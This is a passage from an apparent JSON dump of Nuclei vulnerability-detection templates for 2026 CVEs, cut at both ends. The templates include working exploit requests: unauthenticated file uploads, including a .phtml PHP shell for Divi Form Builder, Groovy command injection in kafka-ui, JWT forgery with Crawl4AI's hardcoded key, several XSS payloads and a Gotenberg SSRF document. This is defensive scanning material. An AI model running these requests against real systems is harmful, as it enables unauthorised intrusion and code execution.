200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /images/baforms/uploads/form-0/{{marker}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"CVE-2026-56291-{{marker}}\")'\n        condition: and\n# digest: 4a0a00473045022100ffe67773d77b1de0e31e2675b59eeb677314262dc492fcb50bcf2077efde6193022012918ca8711d379f58d967902252dd68a6ed884dece4d16fd082cb4aaf3f6c44:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-56291.yaml","vuln_id":"cve-2026-56291"},{"raw":"id: CVE-2026-56290\n\ninfo:\n  name: Page Builder CK <= 3.5.10 - Unauthenticated Arbitrary File Upload\n  author: panchiko-p,0x_Akoko\n  severity: critical\n  description: |\n   Joomla Page Builder CK contains an unrestricted file upload vulnerability caused by lack of proper validation, letting unauthenticated attackers upload executable files and achieve remote code execution.\n  impact: |\n   Unauthenticated attackers can upload executable files, leading to full remote code execution and complete system compromise.\n  remediation: |\n   Update to the latest version of Page Builder CK.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-56290\n    - https://cxsecurity.com/issue/WLB-2026070010\n    - https://www.exploit-db.com/exploits/52626\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-56290\n    epss-score: 0.30866\n    epss-percentile: 0.98171\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: joomlack\n    product: page_builder_ck\n    framework: joomla\n    shodan-query: http.html:\"com_pagebuilderck\"\n    fofa-query: body=\"com_pagebuilderck\"\n  tags: cve,cve2026,joomla,pagebuilderck,file-upload,rce,intrusive,kev,vkev\n\nvariables:\n  marker: \"{{to_lower(rand_base(8))}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"csrf\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: csrf_token\n        group: 1\n        internal: true\n        regex:\n          - 'name=\"([a-f0-9]{32})\"\\s+value=\"1\"'\n          - 'csrf\\.token\"\\s*:\\s*\"([a-f0-9]{32})\"'\n\n  - raw:\n      - |\n        POST /index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&{{csrf_token}}=1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPBCK\n        Referer: {{BaseURL}}/\n        Origin: {{BaseURL}}\n\n        ------WebKitFormBoundaryPBCK\n        Content-Disposition: form-data; name=\"path\"\n\n        media/com_pagebuilderck/gfonts/\n        ------WebKitFormBoundaryPBCK\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{marker}}.txt\"\n        Content-Type: text/plain\n\n        CVE-2026-56290-{{marker}}\n        ------WebKitFormBoundaryPBCK--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /media/com_pagebuilderck/gfonts/{{marker}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"CVE-2026-56290-{{marker}}\")'\n        condition: and\n# digest: 4b0a00483046022100d0ca4a94395d3abc36e7f28bf5b9b3b241198f7ecdc03c0f359a5c6378789f77022100baffbde25d2e48b7a672b89a8250a4fd776d1d611013a088b1dcb2239118a981:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-56290.yaml","vuln_id":"cve-2026-56290"},{"raw":"id: CVE-2026-56270\n\ninfo:\n  name: Flowise <= 3.0.13 - Unauthenticated OAuth Configuration Disclosure\n  author: 0x_Akoko,pdteam\n  severity: high\n  description: |\n    Flowise before 3.1.0 contains a missing authentication vulnerability in the /api/v1/loginmethod endpoint, allowing unauthenticated remote attackers to retrieve an organization's complete SSO configuration including OAuth client secrets by providing an organizationId parameter.\n  impact: |\n    Remote attackers can harvest sensitive OAuth client secrets, leading to potential unauthorized access to integrated services.\n  remediation: |\n    Upgrade to version 3.1.0 or later.\n  reference:\n    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6pcv-j4jx-m4vx\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-56270\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-56270\n    epss-score: 0.02048\n    epss-percentile: 0.80362\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: flowiseai\n    product: flowise\n    shodan-query: http.title:\"Flowise\"\n    fofa-query: title=\"Flowise\"\n  tags: cve,cve2026,flowise,unauth,disclosure,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(tolower(body), \"flowise\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/v1/loginmethod?organizationId=test HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code != 401'\n          - 'contains_any(body, \"Invalid Organization Id\", \"assertEnterprisePlatform\", \"\\\"providers\\\"\", \"\\\"callbacks\\\"\")'\n        condition: and\n# digest: 4b0a00483046022100cb193cf8fbee3cb64181729b0f69bcd0bd6269d853ee7522cbc78a80c0b818fd022100866f89575b1857562cab595a6836c82d470089dbc777a7e81f4bd0a6b0ab76e7:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-56270.yaml","vuln_id":"cve-2026-56270"},{"raw":"id: CVE-2026-56265\n\ninfo:\n  name: Crawl4AI < 0.8.7 - Hardcoded JWT Signing Key Authentication Bypass\n  author: prithvee07\n  severity: critical\n  description: |\n    Crawl4AI Docker API server versions before 0.8.7 ship with a hardcoded default JWT signing key (\"mysecret\") used to sign and verify HS256 authentication tokens. Because the key is identical across every deployment where SECRET_KEY has not been overridden, an unauthenticated attacker can forge a valid Bearer token and use it to access every JWT-protected API endpoint (/md, /html, /screenshot, /pdf, /execute_js, /crawl, /ask).\n  impact: |\n    Unauthenticated attackers can forge valid JWT authentication tokens and gain full access to protected Crawl4AI API endpoints (crawling, screenshot, PDF generation, JavaScript execution, and library context retrieval), resulting in complete compromise of the deployment's intended access control.\n  remediation: |\n    Upgrade Crawl4AI to version 0.8.7 or later, which removes the hardcoded default signing key, rejects known weak secrets, and auto-generates an ephemeral key when JWT authentication is enabled without an explicit SECRET_KEY. As a workaround, set the SECRET_KEY environment variable to a strong random value.\n  reference:\n    - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-365w-hqf6-vxfg\n    - https://www.vulncheck.com/advisories/crawl4ai-authentication-bypass-via-hardcoded-jwt-signing-key\n    - https://github.com/unclecode/crawl4ai\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-56265\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-56265\n    epss-score: 0.02639\n    epss-percentile: 0.84903\n    cwe-id: CWE-798\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: unclecode\n    product: crawl4ai\n    shodan-query: http.html:\"crawl4ai\"\n    fofa-query: body=\"crawl4ai\"\n  tags: cve,cve2026,crawl4ai,auth-bypass,jwt,hardcoded-credentials,unauth\n\nvariables:\n  exp: \"{{unix_time(3600)}}\"\n  secret: \"mysecret\"\n  payload: '{\"scope\":\"data\",\"exp\":{{exp}}}'\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /ask?context_type=code&query=crawl&max_results=1 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n          - 'contains(body, \"Authentication required\") || contains(body, \"No token provided\") || contains(body, \"Not authenticated\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /ask?context_type=code&query=crawl&max_results=1 HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{generate_jwt(payload,\"HS256\",secret)}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"code_results\")'\n          - '!contains(body, \"Invalid or expired token\")'\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - 'to_string(generate_jwt(payload,\"HS256\",secret))'\n# digest: 490a00463044022022689c5a2e97ba30fced85da68c9c49809cd1db01a045e327b6a08aba15e05f302205d5b16f2b99ceaf31dd11fa806bf91c5bc4793dbbf2fcde0de9f14acc665ec2b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-56265.yaml","vuln_id":"cve-2026-56265"},{"raw":"id: CVE-2026-5615\n\ninfo:\n  name: VvvebJs <= 2.0.5 - Cross-Site Scripting\n  author: theamanrawat\n  severity: medium\n  description: |\n    Givanz Vvvebjs <= 2.0.5 contains a stored XSS caused by manipulation of the \"uploadAllowExtensions\" argument in upload.php File Upload Endpoint, letting remote attackers execute scripts, exploit requires crafted input.\n  impact: |\n    Remote attackers can execute arbitrary scripts, potentially leading to session hijacking or user impersonation.\n  remediation: |\n    Apply the patch 8cac22cff99b8bc701c408aa8e887fa702755336 or update to the fixed version.\n  reference:\n    - https://github.com/advisories/GHSA-p873-9x3v-gmvh\n    - https://github.com/givanz/VvvebJs\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\n    cvss-score: 4.3\n    cve-id: CVE-2026-5615\n    epss-score: 0.00773\n    epss-percentile: 0.54213\n    cwe-id: CWE-79\n  metadata:\n    max-request: 2\n    verified: true\n    shodan-query: http.html:\"VvvebJs\"\n  tags: cve,cve2026,xss,stored-xss,file-upload,svg,vvvebjs\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /upload.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=--nuclei{{randstr_1}}\n\n        ----nuclei{{randstr_1}}\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.svg\"\n        Content-Type: image/svg+xml\n\n        <?xml version=\"1.0\" standalone=\"no\"?>\n        <svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\">\n        <text x=\"10\" y=\"20\">{{randstr}}</text>\n        </svg>\n        ----nuclei{{randstr_1}}--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: upload_path\n        part: body\n        group: 0\n        regex:\n          - '/[a-zA-Z0-9_-]+\\.svg'\n        internal: true\n\n  - raw:\n      - |\n        GET {{upload_path}} HTTP/1.1\n        Host: {{Hostname}}\n\n    max-redirects: 2\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"{{randstr}}\", \"<svg xmlns=\\\"http://www.w3.org/2000/svg\\\" onload=\\\"alert(document.domain)\\\">\")'\n          - 'contains(content_type, \"image/svg+xml\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a00473045022100cfea90aa5d8289d324c38408ae27561fb146b20402066ebe4dab6b1ef47079f102202c6dc9799b9de979aae61eeeefb20a2a277e27769eb582eb9a56998e64b0e0e9:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-5615.yaml","vuln_id":"cve-2026-5615"},{"raw":"id: CVE-2026-5562\n\ninfo:\n  name: Provectus kafka-ui <=0.7.2 - Remote Code Execution\n  author: christianfl,0xNayel\n  severity: critical\n  description: |\n    Provectus kafka-ui versions 0.7.0 through 0.7.2 are vulnerable to code injection in the `/api/smartfilters/testexecutions` endpoint. The `filterCode` parameter is evaluated as a Groovy expression without sandboxing, allowing an unauthenticated attacker to execute arbitrary code and operating-system commands on the host.\n  impact: |\n    Successful exploitation grants unauthenticated remote code execution in the context of the kafka-ui process, leading to full compromise of the host and the connected Kafka clusters.\n  remediation: |\n    Provectus kafka-ui is end-of-life and no patched release exists (0.7.2 is the final version). Migrate to the maintained kafbat/kafka-ui fork, and in the meantime restrict network access to the interface and place it behind authentication.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-5562\n    - https://vuldb.com/?id.355332\n    - https://github.com/provectus/kafka-ui\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-5562\n    epss-score: 0.02023\n    epss-percentile: 0.80112\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: provectus\n    product: kafka-ui\n    shodan-query: http.title:\"UI for Apache Kafka\"\n    fofa-query: title=\"UI for Apache Kafka\"\n  tags: cve,cve2026,rce,kafka-ui,provectus,groovy,injection,intrusive\n\nvariables:\n  cmd: \"id\"\n  marker: \"{{rand_base(6)}}\"\n\nhttp:\n  - raw:\n      - |\n        PUT /api/smartfilters/testexecutions HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json\n\n        {\n          \"filterCode\": \"throw new Exception('{{marker}}_' + '{{cmd}}'.execute().text)\",\n          \"key\": \"k\",\n          \"value\": \"v\",\n          \"offset\": 0,\n          \"partition\": 0,\n          \"timestampMs\": 0\n        }\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{marker}}_\"\n\n      - type: regex\n        part: body\n        regex:\n          - \"uid=[0-9]+.*gid=[0-9]+.*\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - \"{{marker}}_(uid=[0-9]+\\\\([a-z0-9_-]+\\\\)[^\\\"\\\\\\\\]*)\"\n# digest: 4b0a00483046022100f63aa8736a1e0d59b569153c0bcd4e50c5d9b14e6ce83cfef00a022c211cddd3022100c4334eaf07d1f2ea69d54c1ddf33dee0eae5935d28af449fc760de2c6949ce42:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-5562.yaml","vuln_id":"cve-2026-5562"},{"raw":"id: CVE-2026-55592\n\ninfo:\n  name: Dashy <= 4.3.6 - Reflected XSS via Workspace\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    Dashy versions up to 4.3.6 contain a reflected cross-site scripting vulnerability in the workspace view. The url query parameter is passed directly to an iframe src attribute without scheme validation, allowing an attacker to inject javascript: URIs that execute arbitrary JavaScript in the context of the Dashy origin.\n  impact: |\n    If a logged-in user opens a crafted link, JavaScript executes on the Dashy origin with access to same-origin browser data, the Dashy DOM, and can send requests as the victim.\n  remediation: |\n    Update Dashy to version 4.3.7 or later.\n  reference:\n    - https://github.com/Lissy93/dashy/security/advisories/GHSA-58mp-4qr3-vmrc\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-55592\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-55592\n    epss-score: 0.00284\n    epss-percentile: 0.21217\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: lissy93\n    product: dashy\n    shodan-query: title:\"Dashy\"\n    fofa-query: title=\"Dashy\"\n  tags: cve,cve2026,dashy,xss,reflected\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/healthz\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"version\\\"\")'\n          - 'compare_versions(version, \"< 4.3.7\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '\"version\"\\s*:\\s*\"([0-9.]+)\"'\n        internal: true\n\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '\"version\"\\s*:\\s*\"([0-9.]+)\"'\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/workspace?url=javascript%3Aalert%28document.domain%29\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"javascript:alert(document.domain)\")'\n        condition: and\n# digest: 4a0a0047304502210094a77bbf7b3a55703991693c17607c3bc6aba352a2d1602cd50c2356c207e223022046efee41b3432e461540dc351c3e3a4f5eb5c1194ec3bfd899dc650c46ea72f7:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-55592.yaml","vuln_id":"cve-2026-55592"},{"raw":"id: CVE-2026-55549\n\ninfo:\n  name: Yamcs <=5.8.6 - Cross-Site Scripting\n  author: str4k3r\n  severity: medium\n  description: |\n    Yamcs < 5.9.4 contains a stored XSS caused by inadequate HTML escaping of attacker-controlled redirect_uri parameter in authorization template, letting attackers execute JavaScript to steal authentication data, exploit requires user to open crafted URL.\n  impact: |\n    Attackers can execute JavaScript in victim's browser to steal authentication tokens, leading to account compromise.\n  remediation: |\n    Update to version 5.9.4 or later.\n  reference:\n    - https://github.com/yamcs/yamcs/security/advisories/GHSA-rxpg-wjf8-qv9c\n    - https://github.com/yamcs/yamcs/commit/4d47d5cdcf5d92c2c5bbbc19feada422923332e3\n    - https://github.com/yamcs/yamcs/releases/tag/yamcs-5.9.4\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-55549\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2026-55549\n    epss-score: 0.00897\n    epss-percentile: 0.58068\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: yamcs\n    product: yamcs\n    shodan-query: 'title:\"Yamcs\"'\n  tags: cve,cve2026,yamcs,xss,reflected\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/auth/authorize?client_id=yamcs-web&state=stable-state&response_mode=query&response_type=code&scope=openid&redirect_uri=https%3A%2F%2Fexample.com%2Fcbi0i7y\\\"><script>alert(document.domain)</script>\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'value=\"https://example.com/cbi0i7y\"><script>alert(document.domain)</script>\"'\n          - 'value=\"yamcs-web\"'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: content_type\n        words:\n          - 'text/html'\n# digest: 4a0a004730450220395d403fa6aaf62fdb975791b9a015249ff139fb3f707a0a90c9b34ee340a675022100ee96b08b218feee71258ab4524756333a7b6a99fb1832edbf866e6aec75f3af0:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-55549.yaml","vuln_id":"cve-2026-55549"},{"raw":"id: CVE-2026-55450\n\ninfo:\n  name: Langflow < 1.9.1 - Unauthenticated File Upload\n  author: xtr0nix\n  severity: critical\n  description: |\n   Langflow < 1.9.1 contains an unrestricted file upload caused by lack of upload limitations, letting unauthenticated attackers exhaust server space and leak absolute file paths, exploit requires network access.\n  impact: |\n    Unauthenticated attackers can exhaust server storage and gain information about file paths, potentially aiding further attacks.\n  remediation: |\n    Update to version 1.9.1 or later.\n  reference:\n    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-x223-p2gf-v735\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:H\n    cvss-score: 9.3\n    cve-id: CVE-2026-55450\n    epss-score: 0.0119\n    epss-percentile: 0.66589\n    cwe-id: CWE-306,CWE-400,CWE-200\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,langflow,unauth,intrusive,vkev\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/api/v1/upload/11111111-1111-1111-1111-111111111111\"\n\n    body: |\n      --boundary\n      Content-Disposition: form-data; name=\"file\"; filename=\"x.{{repeat('a', 300)}}\"\n      Content-Type: text/plain\n\n      probe\n      --boundary--\n    headers:\n      Content-Type: multipart/form-data; boundary=boundary\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 500\n          - contains(body, \"[Errno 36] File name too long\")\n          - contains(content_type, \"application/json\")\n        condition: and\n# digest: 4b0a004830460221009a314362e1248ee51547919da9472d3efaeb44b01ca00c58aaac0f8f9ecbc7e6022100e79376444b78f58ba603d34ea3393bf58bcc062070fbb31f5c6185b4e86d94b0:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-55450.yaml","vuln_id":"cve-2026-55450"},{"raw":"id: CVE-2026-5524\n\ninfo:\n  name: Divi Form Builder <=5.1.8 - Unauthenticated Arbitrary File Upload RCE\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    The Divi Form Builder plugin for WordPress versions 5.1.8 and prior contains an unauthenticated arbitrary file upload vulnerability in the do_image_upload() AJAX handler. The user-controlled acceptFileTypes POST parameter is injected unsanitized into a PHP regex for file extension validation. By supplying acceptFileTypes=phtml the constructed regex accepts .phtml files while the plugin's .htaccess only blocks .php, so Apache executes .phtml files as PHP. The required nonce (fb_nonce) is publicly embedded in any page containing a Divi form via the de_fb_obj JavaScript object. Uploaded shells land in /wp-content/uploads/de_fb_uploads/. Fixed in 5.1.9.\n  impact: |\n    Unauthenticated remote attackers can upload and execute arbitrary PHP code as the web server user, achieving full remote code execution on any WordPress site running the vulnerable plugin version with a publicly accessible form page.\n  remediation: |\n    Update the Divi Form Builder plugin to version 5.1.9 or later, which validates file extensions without relying on the user-controlled acceptFileTypes parameter.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-5524\n    - https://github.com/caterscam/CVE-2026-5524-PoC\n    - https://wpscan.com/vulnerability/CVE-2026-5524\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-5524\n    epss-score: 0.03484\n    epss-percentile: 0.88596\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 8\n    vendor: elegantthemes\n    product: divi-form-builder\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/divi-form-builder/\"\n  tags: cve,cve2026,wordpress,wp-plugin,divi,elegantthemes,file-upload,rce,unauth,intrusive,vkev\n\nvariables:\n  fname: \"{{rand_text_alpha(8)}}\"\n  marker: \"{{randstr}}\"\n\nflow: |\n  http(1)\n  if (template[\"fb_nonce\"] == \"\") {\n    stop()\n  }\n  http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET {{paths}} HTTP/1.1\n        Host: {{Hostname}}\n        Cache-Control: no-cache\n\n    payloads:\n      paths:\n        - \"/\"\n        - \"/contact\"\n        - \"/contact-us\"\n        - \"/get-in-touch\"\n        - \"/quote\"\n        - \"/demo\"\n\n    attack: clusterbomb\n\n    stop-at-first-match: true\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"de_fb_obj\") && contains(body, \"fb_nonce\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: fb_nonce\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '\"fb_nonce\"\\s*:\\s*\"([a-f0-9]{10})\"'\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDFB5524PoC\n        Origin: {{RootURL}}\n        Referer: {{RootURL}}/\n\n        ------WebKitFormBoundaryDFB5524PoC\n        Content-Disposition: form-data; name=\"action\"\n\n        de_fb_image_upload\n        ------WebKitFormBoundaryDFB5524PoC\n        Content-Disposition: form-data; name=\"fb_nonce\"\n\n        {{fb_nonce}}\n        ------WebKitFormBoundaryDFB5524PoC\n        Content-Disposition: form-data; name=\"acceptFileTypes\"\n\n        phtml\n        ------WebKitFormBoundaryDFB5524PoC\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{fname}}.phtml\"\n        Content-Type: image/jpeg\n\n        <?php echo md5('{{marker}}');unlink(__FILE__);?>\n        ------WebKitFormBoundaryDFB5524PoC--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"files\") && contains(body, \"{{fname}}\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-content/uploads/de_fb_uploads/{{fname}}.phtml HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"{{md5(marker)}}\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450221009129ac04e0038c52a428e7740d0e80377cfd9ac8f0b431217a796e06e18f40a902203fc8464a6e5865d1c410f64e7fffb5462e10ef025552cb91f43cd6b32b4df014:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-5524.yaml","vuln_id":"cve-2026-5524"},{"raw":"id: CVE-2026-55229\n\ninfo:\n  name: Gotenberg < 8.34.0 - Local File Disclosure\n  author: str4k3r\n  severity: high\n  description: |\n    Gotenberg before 8.34.0 allows SSRF and limited local file disclosure via its /forms/libreoffice/convert endpoint. When LibreOffice is used to convert user-uploaded DOCX files, external relationships within the document (such as a:blip r:link TargetMode=\"External\") can instruct LibreOffice to fetch local resources (file://) or remote resources (http/https), which are then included as images in the generated PDF. This can disclose the contents of local files LibreOffice can open as images, or allow outbound requests to attacker-controlled endpoints. Version 8.34.0 disables resolution of external resources during document conversion to mitigate the vulnerability.\n  impact: |\n    Attackers can perform blind SSRF and limited local file disclosure, potentially accessing internal resources or sensitive files.\n  remediation: |\n    Update to version 8.34.0 or later.\n  reference:\n    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-2mrg-35hw-x3x9\n    - https://github.com/gotenberg/gotenberg/releases/tag/v8.34.0\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-55229\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-55229\n    epss-score: 0.01514\n    epss-percentile: 0.73373\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 1\n    product: gotenberg\n    vendor: gotenberg\n    shodan-query: \"Gotenberg\"\n    fofa-query: \"Gotenberg\"\n  tags: cve,cve2026,gotenberg,ssrf,lfi\n\nhttp:\n  - raw:\n      - |\n        POST /forms/libreoffice/convert HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=testforgeboundary\n\n        --testforgeboundary\n        Content-Disposition: form-data; name=\"files\"; filename=\"poc.docx\"\n        Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document\n\n        {{base64_decode(\"UEsDBBQAAAAIAKKjCF0XmADX6wAAALIBAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbH1QyU4DMQy98xWRr2gmAweEUKc9sByBQ/kAK/HMRM2mOC3t3+NpoQdUONpvs99itQ9e7aiwS7GHm7YDRdEk6+LYw8f6pbkHxRWjRZ8i9XAghtXyarE+ZGIl4sg9TLXmB63ZTBSQ25QpCjKkErDKWEad0WxwJH3bdXfapFgp1qbOHiBmTzTg1lf1vJf96ZJCnkE9nphzWA+Ys3cGq+B6F+2vmOY7ohXlkcOTy3wtBNCXI2bo74Qf4ZuUU5wl9Y6lvmIQmv5MxWqbzDaItP3f58KlaRicobN+dsslGWKW1oNvz0hAF88f6GPlyy9QSwMEFAAAAAgAoqMIXT+t/vqvAAAALAEAAAsAAABfcmVscy8ucmVsc43POw7CMAwA0J1TRN5pWgaEUEMXhNQVlQNEiZtWNB/F4dPbk4EBKgZG/57tunnaid0x0uidgKoogaFTXo/OCLh0p/UOGCXptJy8QwEzEjSHVX3GSaY8Q8MYiGXEkYAhpbDnnNSAVlLhA7pc6X20MuUwGh6kukqDfFOWWx4/DVigrNUCYqsrYN0c8B/c9/2o8OjVzaJLP3YsOrIso8Ek4OGj5vqdLjILPJ/Dv548vABQSwMEFAAAAAgAoqMIXZKedKzAAQAAagQAABEAAAB3b3JkL2RvY3VtZW50LnhtbKVU22rjMBB971cIvbdyw9JtTJxCCV0KZQml+wGqJMei1oWRkjh/vyP5koSyS2hfzBlp5szRnMGLh860ZKcgaGcrentTUKKscFLbTUX/vD1d31MSIreSt86qih5UoA/Lq8W+lE5sjbKRIIMN5b6iTYy+ZCyIRhkebpxXFu9qB4ZHDGHD9g6kBydUCNjAtGxWFHfMcG3p1cjjLyGSwPcnDOe8q/5youRfYDzT5LX4AgVWxS2oiQUu4XB1rYVaDbPtiUC1PKI/odE+0Dz8dycPGfj8hd6Rvn/CvtS21VYRqUN8qyjamtDjhF4m9JpQX6O6mAwVXUXn8+KuwAxxqOjP+ezHfUFZn4S+r4FoidtCieUGl2Ldv5Tc5hxeboD7RotTvOKRky3ob8wR6RAmMwZkd9h4DUMkfu/+r2tMSjUpZp853lvtn3TbZuUpIFDiGD8qCs/y2WzGB4YIKopmibDG9FclIlsu2PFiYD/hS2HwuRMvuxpMKka3SZedOKQvS2dowr8dSD1ycWLxEOIv5QxJACWiCpoY+O4lDHrGlFHQoIAdB8nOLDo7SMG0STk4WTHWbx0